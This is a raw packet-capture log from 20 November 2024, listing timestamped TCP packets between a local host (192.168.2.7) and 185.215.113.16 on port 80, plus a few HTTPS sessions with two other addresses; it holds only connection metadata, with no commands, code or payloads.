                                                                                                                                                                                                Nov 20, 2024 10:54:34.256189108 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.256201982 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.256241083 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.256795883 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.256812096 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.256827116 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.256850958 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.257193089 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.257230043 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.257235050 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.257244110 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.257258892 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.257287979 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.257812023 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.257826090 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.257841110 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.257853031 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.257855892 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.257872105 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.258495092 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.258511066 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.258527040 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.258537054 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.258578062 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.259242058 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.259268045 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.259279966 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.259294987 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.259332895 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.259332895 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260077000 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260092020 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260107994 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260123014 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260132074 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260159016 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260166883 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260194063 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260217905 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260226011 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260234118 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260250092 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260271072 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260541916 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260557890 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260571957 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260591984 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260616064 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260716915 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260736942 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260754108 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260767937 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260777950 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260787010 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260802984 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260821104 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.260845900 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261344910 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261359930 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261374950 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261396885 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261455059 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261470079 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261485100 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261491060 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261519909 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261524916 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261539936 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261554956 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261571884 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261580944 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261615038 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261872053 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261887074 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261902094 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.261925936 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.262228966 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.262244940 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.262260914 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.262269020 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.262303114 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.262953997 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.262967110 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.262980938 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.262995958 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.263011932 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.263037920 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.264272928 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.264286995 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.264302969 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.264328957 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.264384031 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.264439106 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.265424967 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.265439987 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.265455008 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.265476942 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266033888 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266047955 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266063929 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266073942 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266105890 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266109943 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266120911 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266160011 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266227961 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266292095 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266313076 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266328096 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266343117 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266386986 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266459942 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266504049 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266511917 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266526937 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266541958 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.266562939 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.278377056 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.278390884 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.278407097 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.278422117 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.278434992 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.278469086 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.279032946 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.279052019 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.279074907 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.279077053 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.279093981 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.279109955 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.279118061 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.279124975 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.279143095 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.279145002 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.279184103 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.289202929 CET4434981313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.290139914 CET49813443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.290160894 CET4434981313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.290625095 CET49813443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.290631056 CET4434981313.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.311127901 CET4434981413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.311666012 CET49814443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.311681986 CET4434981413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.312129021 CET49814443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.312134981 CET4434981413.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.344935894 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.344949961 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.344964027 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345000982 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345108032 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345144987 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345243931 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345261097 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345295906 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345746040 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345758915 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345773935 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345793009 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345900059 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345912933 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345927954 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345937014 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345942974 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.345962048 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.346395969 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.346410036 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.346424103 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.346432924 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.346441984 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.346462011 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.354221106 CET4434981513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.357311964 CET49815443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.357342958 CET4434981513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.357866049 CET49815443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.357878923 CET4434981513.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.374327898 CET4434981620.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.374393940 CET49816443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:54:34.375555038 CET4434981713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.376313925 CET49817443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.376313925 CET49816443192.168.2.720.109.210.53
                                                                                                                                                                                                Nov 20, 2024 10:54:34.376332045 CET4434981713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.376347065 CET4434981620.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.376686096 CET4434981620.109.210.53192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.376760006 CET49817443192.168.2.713.107.246.45
                                                                                                                                                                                                Nov 20, 2024 10:54:34.376765966 CET4434981713.107.246.45192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.378477097 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.378493071 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.378508091 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.378531933 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.378563881 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.379338980 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.379391909 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.379405975 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.379419088 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.379434109 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.379453897 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.379813910 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.379843950 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.379857063 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.379878044 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.379887104 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.379914999 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.380778074 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.380826950 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.380841017 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.380856037 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.380873919 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.380891085 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.381534100 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.381580114 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.381592989 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.381607056 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.381627083 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.381661892 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.382253885 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.382266998 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.382282972 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.382294893 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.382307053 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.382328987 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383027077 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383040905 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383064985 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383070946 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383111954 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383296967 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383310080 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383330107 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383347988 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383348942 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383366108 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383382082 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383394003 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383426905 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383510113 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383534908 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383548021 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383562088 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383570910 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383579016 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383606911 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383644104 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383658886 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383676052 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383681059 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383708000 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383733034 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383815050 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383830070 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383837938 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383865118 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383889914 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383905888 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383910894 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383924007 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.383941889 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.384016991 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.384032011 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.384048939 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.384071112 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.384092093 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.384102106 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.384109974 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.384125948 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.384138107 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.384145975 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.384172916 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.385862112 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.386182070 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.386194944 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.386224985 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.386348009 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.386388063 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.386590004 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.386754036 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.386794090 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.387013912 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.387029886 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.387064934 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.388528109 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.388544083 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.388560057 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.388572931 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.388580084 CET4981280192.168.2.7185.215.113.16
                                                                                                                                                                                                Nov 20, 2024 10:54:34.388581991 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.388591051 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.388598919 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.388607025 CET8049812185.215.113.16192.168.2.7
                                                                                                                                                                                                Nov 20, 2024 10:54:34.388631105 CET4981280192.168.2.7185.215.113.16
